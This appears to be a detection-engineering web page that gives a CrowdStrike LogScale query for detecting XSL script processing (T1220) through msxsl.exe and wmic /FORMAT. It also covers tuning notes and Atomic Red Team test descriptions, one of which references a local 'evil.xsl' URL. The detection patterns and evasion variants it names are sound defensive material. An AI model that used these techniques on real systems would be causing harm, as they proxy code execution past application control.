Detect XSL Script Processing in CrowdStrike LogScale
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files support embedded scripting in JavaScript, VBScript, and other languages. Two primary abuse vectors exist: (1) msxsl.exe, Microsoft's command-line XSLT transformation utility, which can execute arbitrary JavaScript or VBScript embedded in local or remote XSL files; and (2) wmic.exe with the /FORMAT switch ('Squiblytwo'), which invokes JScript or VBScript within XSL via WMI. Both techniques leverage trusted Windows tooling to proxy malicious code execution while evading application control solutions such as AppLocker. Since msxsl.exe is not installed by default, adversaries typically drop it alongside their payloads. Real-world usage includes Astaroth, Cobalt Group, and Higaisa.
MITRE ATT&CK
- Tactic
- Defense Evasion
- Technique
- T1220 XSL Script Processing
- Canonical reference
- https://attack.mitre.org/techniques/T1220/
LogScale Detection Query
// T1220 XSL Script Processing — msxsl.exe and wmic.exe /FORMAT (Squiblytwo)
#event_simpleName = "ProcessRollup2"
| ImageFileName = /(?i)msxsl\.exe$/ OR
(ImageFileName = /(?i)wmic\.exe$/ AND CommandLine = /(?i)/format/i)
| eval is_msxsl = if(ImageFileName = /(?i)msxsl\.exe$/, 1, 0)
| eval is_wmic_format = if(ImageFileName = /(?i)wmic\.exe$/ AND CommandLine = /(?i)/format/, 1, 0)
| eval remote_load = if(CommandLine = /(?i)(https?:\/\/|ftp:\/\/|\\\\)/, 1, 0)
| eval arbitrary_ext = if(CommandLine = /(?i)\.(jpeg|jpg|png|gif|txt|dat|bin|log)\s/, 1, 0)
| eval same_file_arg = if(CommandLine = /([^\s]+\.[a-z]+)\s+\1/, 1, 0)
| eval xsl_format_target = if(CommandLine = /(?i)\/format[:\s]+[^\s]*\.xslt?/, 1, 0)
| eval remote_xsl_format = if(is_wmic_format = 1 AND remote_load = 1, 1, 0)
| eval technique_variant = case(
is_msxsl = 1 AND remote_load = 1, "msxsl-remote-xsl",
is_msxsl = 1 AND same_file_arg = 1, "msxsl-same-file",
is_msxsl = 1 AND arbitrary_ext = 1, "msxsl-arbitrary-ext",
is_msxsl = 1, "msxsl-local-xsl",
remote_xsl_format = 1, "squiblytwo-remote",
is_wmic_format = 1, "squiblytwo-local",
*, "unknown")
| eval risk_score = is_msxsl + remote_load + arbitrary_ext + same_file_arg + remote_xsl_format
| table([
timestamp, ComputerName, UserName, ImageFileName, CommandLine,
ParentImageFileName, ParentCommandLine,
technique_variant, remote_load, arbitrary_ext, same_file_arg, risk_score
])
| sort(timestamp, order=desc)CrowdStrike LogScale (Falcon) CQL query detecting T1220 XSL Script Processing. Queries ProcessRollup2 events for msxsl.exe invocations and wmic.exe /FORMAT abuse. Classifies technique variants (remote XSL, same-file-twice, arbitrary extension, Squiblytwo local/remote) and computes a composite risk score.
Data Sources
Required Tables
False Positives & Tuning
- Legitimate use of msxsl.exe by internal XML/XSLT processing tools accessing shared network drives via UNC paths, which trigger the remote-load indicator
- wmic.exe /FORMAT invocations by monitoring or inventory scripts that format WMI output using approved local XSL stylesheets
- Automated software packaging or installation processes that invoke msxsl.exe to process XML configuration transforms during deployment
Other platforms for T1220
Testing Methodology
Validate this detection against 5 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1msxsl.exe Local XSL Script Execution
Expected signal: Sysmon Event ID 1: Process Create with Image=msxsl.exe, CommandLine containing test.xml and test.xsl. Sysmon Event ID 7: Image Load for jscript.dll loaded by msxsl.exe, confirming JScript engine activation. Sysmon Event ID 1: Child process whoami.exe spawned by msxsl.exe (or WScript.Shell). Sysmon Event ID 11: File creation events for test.xml and test.xsl.
- Test 2msxsl.exe Same-File Argument Evasion
Expected signal: Sysmon Event ID 1: Process Create with Image=msxsl.exe, CommandLine showing the same filename appearing twice (e.g., 'selfref.xsl selfref.xsl'). Sysmon Event ID 7: Image Load for jscript.dll by msxsl.exe. Sysmon Event ID 11: File creation for selfref.xsl.
- Test 3Squiblytwo — wmic /FORMAT Remote XSL Execution
Expected signal: Sysmon Event ID 1: Process Create with Image=wmic.exe, CommandLine containing '/FORMAT' and 'http://127.0.0.1:19823/evil.xsl'. Sysmon Event ID 3: Network Connection attempt from wmic.exe to 127.0.0.1:19823 (connection refused, but event is logged). Sysmon Event ID 22: DNS query if a hostname is used instead of IP.
- Test 4Squiblytwo — wmic /FORMAT Local XSL File
Expected signal: Sysmon Event ID 1: Process Create with Image=wmic.exe, CommandLine containing '/FORMAT' and the %TEMP% path to wmic_test.xsl. Sysmon Event ID 7: jscript.dll loaded by wmic.exe. Sysmon Event ID 11: File creation for wmic_test.xsl.
- Test 5msxsl.exe Arbitrary Extension Masking
Expected signal: Sysmon Event ID 1: Process Create with Image=msxsl.exe, CommandLine containing '.jpeg' file extensions instead of .xsl. Sysmon Event ID 7: jscript.dll loaded by msxsl.exe. Sysmon Event ID 11: File creation events for data.jpeg and style.jpeg.
References (10)
- https://attack.mitre.org/techniques/T1220/
- https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
- https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
- https://lolbas-project.github.io/lolbas/Binaries/Wmic/
- https://lolbas-project.github.io/lolbas/Binaries/Msxsl/
- https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
- https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md
- https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_lolbin_msxsl.yml
- https://www.cybereason.com/blog/astaroth-malware-abuses-legitimate-os-and-antivirus-processes
Unlock Pro Content
Get the full detection package for T1220 including response playbook, investigation guide, and atomic red team tests.